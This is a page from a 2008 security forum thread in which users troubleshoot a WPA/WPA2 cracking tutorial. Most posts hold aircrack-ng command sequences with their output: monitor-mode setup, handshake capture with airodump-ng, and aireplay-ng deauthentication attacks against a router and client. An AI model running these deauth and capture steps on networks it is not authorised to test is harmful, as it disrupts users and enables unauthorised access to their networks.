Page 28 of 36 FirstFirst ... 182627282930 ... LastLast
Results 271 to 280 of 359

Thread: -=Xploitz=- VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"

  1. #271

    Default

    Quote Originally Posted by -=Xploitz=- View Post
    Did you forget to post your password list? Or am I missing something?
    lol double posted, but I think he forgot somethign?

  2. #272
    Just burned his ISO mcrete's Avatar
    Join Date
    Mar 2008
    Posts
    19

    Default

    there is the attachment of my previous post

  3. #273
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Quote Originally Posted by mcrete View Post
    there is the attachment of my previous post


    Sorry, the free service is at full capacity. Please try later or upgrade to sendspace Max™ to enable guaranteed slots and instant, fast downloads.

    Oh well, rapidshare is slightly better. ;P
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  4. #274
    Just burned his ISO mcrete's Avatar
    Join Date
    Mar 2008
    Posts
    19

    Default

    Soon I would upload this list in rapidshare!!

  5. #275
    Just burned his ISO
    Join Date
    Mar 2008
    Posts
    16

    Default

    Hi, I get an error... This, my full command from beginning.
    Quote Originally Posted by -=Xploitz=- View Post
    svn co attp://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
    cd aircrack-ng
    make
    make install
    done.

    Code:
    odod ~ # airmon-ng stop ath0
    
    
    Interface       Chipset         Driver
    
    wifi0           Atheros         madwifi-ng
    ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)
    
    odod ~ # airmon-ng start wifi0
    
    
    Interface       Chipset         Driver
    
    wifi0           Atheros         madwifi-ng
    ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
    
    odod ~ # airodump-ng ath0 
    
     CH  5 ][ Elapsed: 8 s ][ 2008-04-09 18:45
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
    
     00:11:22:33:44:55   23        1        2    0   1  54. WPA  TKIP   PSK  <leng
    
     BSSID              STATION            PWR   Rate  Lost  Packets  Probes
    
     00:11:22:33:44:55  66:77:88:99:00:11   -1  36- 0     0        2
    
    odod ~ # airodump-ng -c 1 -w psk --bssid 00:11:22:33:44:55 ath0
    New Shell

    Code:
    odod ~ # aireplay-ng -0 1 -a 00:11:22:33:44:55 -c 66:77:88:99:00:11 ath0
    18:49:57  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1
    18:49:57  Sending 64 directed DeAuth. STMAC: [66:77:88:99:00:11] [ 0| 0 ACKs]
    odod ~ #
    Is this has something wrong?

    @-=Xploitz=-
    Your Solution is my New Experience. Thx.

  6. #276

    Default

    Quote Originally Posted by odod1985 View Post
    Hi, I get an error... This, my full command from beginning.

    done.

    Code:
    odod ~ # airmon-ng stop ath0
    
    
    Interface       Chipset         Driver
    
    wifi0           Atheros         madwifi-ng
    ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)
    
    odod ~ # airmon-ng start wifi0
    
    
    Interface       Chipset         Driver
    
    wifi0           Atheros         madwifi-ng
    ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
    
    odod ~ # airodump-ng ath0 
    
     CH  5 ][ Elapsed: 8 s ][ 2008-04-09 18:45
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
    
     00:11:22:33:44:55   23        1        2    0   1  54. WPA  TKIP   PSK  <leng
    
     BSSID              STATION            PWR   Rate  Lost  Packets  Probes
    
     00:11:22:33:44:55  66:77:88:99:00:11   -1  36- 0     0        2
    
    odod ~ # airodump-ng -c 1 -w psk --bssid 00:11:22:33:44:55 ath0
    New Shell

    Code:
    odod ~ # aireplay-ng -0 1 -a 00:11:22:33:44:55 -c 66:77:88:99:00:11 ath0
    18:49:57  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1
    18:49:57  Sending 64 directed DeAuth. STMAC: [66:77:88:99:00:11] [ 0| 0 ACKs]
    odod ~ #
    Is this has something wrong?
    See where i've highlighted in red, why is your BSSID 00:11:22:33:44:55??
    or are you just masking out YOUR router MAC?

    From this
    aireplay-ng -0 1 -a 00:11:22:33:44:55 -c 66:77:88:99:00:11 ath0

    To This
    aireplay-ng -0 1 -e YOUR ROUTERNAME HERE -a 00:11:22:33:44:55 -c 66:77:88:99:00:11 ath0

    Also, have you established your ESSID yet? as I noticed <length

    How near / far are you from your router? & is there a client (66:77:88:99:00:11) yours as in is this definately connected to the same router?

  7. #277
    Just burned his ISO
    Join Date
    Mar 2008
    Posts
    16

    Default

    Quote Originally Posted by samsung View Post
    See where i've highlighted in red, why is your BSSID 00:11:22:33:44:55??
    or are you just masking out YOUR router MAC?
    Yes, I just masking out my router MAC.

    Quote Originally Posted by samsung View Post
    From this
    aireplay-ng -0 1 -a 00:11:22:33:44:55 -c 66:77:88:99:00:11 ath0

    To This
    aireplay-ng -0 1 -e YOUR ROUTERNAME HERE -a 00:11:22:33:44:55 -c 66:77:88:99:00:11 ath0
    Code:
    odod ~ # aireplay-ng -0 1 -e 'home' -a 00:11:22:33:44:55 -c 66:77:88:99:00:11 ath0
    18:49:57  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1
    18:49:57  Sending 64 directed DeAuth. STMAC: [66:77:88:99:00:11] [ 0| 0 ACKs]
    odod ~ #
    Quote Originally Posted by samsung View Post
    Also, have you established your ESSID yet? as I noticed <length
    <length because Broadcast = Disabled

    Quote Originally Posted by samsung View Post
    How near / far are you from your router?
    1"-2"

    Quote Originally Posted by samsung View Post
    & is there a client (66:77:88:99:00:11) yours as in is this definately connected to the same router?
    Yes, Still Connected.

    Help... Help...

    btw, thx fot the reply.

  8. #278
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    You said you listed ALL your commands...so wheres your macchanger command at??


    Also..I'd like to add that you might want to use channel 1 in your airmon-ng command to this>>>>

    airmon-ng start wifi0 1

    That will help you stay locked onto that particular channel.


    Follow samsungs advice, hes right on target. Since the essid broadcast is obviously off...you'll need to put the essid in your aireplay-ng command line.

    And use 5 to 10 deauths instead of only 1.

    aireplay-ng -0 5 -a 00:11:22:33:44:55 -c 66:77:88:99:00:11 ath0


    ***EDIT**..if the essid has a space or any special characters in it...put it in double quotes like this>>>

    "-=Xploitz Network=-"
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  9. #279
    Just burned his ISO
    Join Date
    Mar 2008
    Posts
    16

    Default

    Something wrong if i change this:
    airmon-ng start wifi0 to airmon-ng start wifi0 1

    This the command:
    Code:
    odod ~ # airmon-ng stop ath0
    
    Interface       Chipset         Driver
    
    wifi0           Atheros         madwifi-ng
    ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)
    
    
    odod ~ # airmon-ng start wifi0 1
    
    Interface       Chipset         Driver
    
    wifi0           Atheros         madwifi-ng
    ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
    
    
    odod ~ # airodump-ng ath0
    
    CH 12 ][ Elapsed: 3 mins ][ 2008-04-09 22:42
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
    
     00:90:4C:91:00:01   15      162        4    0   1  54. WPA  TKIP   PSK  <leng
    
     BSSID              STATION            PWR   Rate  Lost  Packets  Probes
    ===== not detect my client =====
    
    odod ~ # airodump-ng -c 1 -w psk --bssid 00:90:4C:91:00:01 ath0
    
     CH  1 ][ Elapsed: 2 mins ][ 2008-04-09 22:45 ][ fixed channel ath0: 12
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ES
    ===== empty =====
    
     BSSID              STATION            PWR   Rate  Lost  Packets  Probes
    ===== empty =====
    
    odod ~ #
    Fiuh... Is it new problem???

    btw, Thx All...

  10. #280
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Quote Originally Posted by odod1985 View Post
    Something wrong if i change this:
    airmon-ng start wifi0 to airmon-ng start wifi0 1

    This the command:
    Code:
    odod ~ # airmon-ng stop ath0
    
    Interface       Chipset         Driver
    
    wifi0           Atheros         madwifi-ng
    ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)
    
    
    odod ~ # airmon-ng start wifi0 1
    
    Interface       Chipset         Driver
    
    wifi0           Atheros         madwifi-ng
    ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
    
    
    odod ~ # airodump-ng ath0
    
    CH 12 ][ Elapsed: 3 mins ][ 2008-04-09 22:42
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
    
     00:90:4C:91:00:01   15      162        4    0   1  54. WPA  TKIP   PSK  <leng
    
     BSSID              STATION            PWR   Rate  Lost  Packets  Probes
    ===== not detect my client =====
    
    odod ~ # airodump-ng -c 1 -w psk --bssid 00:90:4C:91:00:01 ath0
    
     CH  1 ][ Elapsed: 2 mins ][ 2008-04-09 22:45 ][ fixed channel ath0: 12
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ES
    ===== empty =====
    
     BSSID              STATION            PWR   Rate  Lost  Packets  Probes
    ===== empty =====
    
    odod ~ #
    Fiuh... Is it new problem???

    btw, Thx All...
    Sorry, but I have to ask......

    Is your client connected? Also it might be "hiding"...try using the command >>>>>>

    Code:
    aireplay-ng -0 5 -a 00:90:4C:91:00:01 ath0
    to flush it out. This command will send 5 deauths to the AP and *should* unhide your connected client.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

Page 28 of 36 FirstFirst ... 182627282930 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •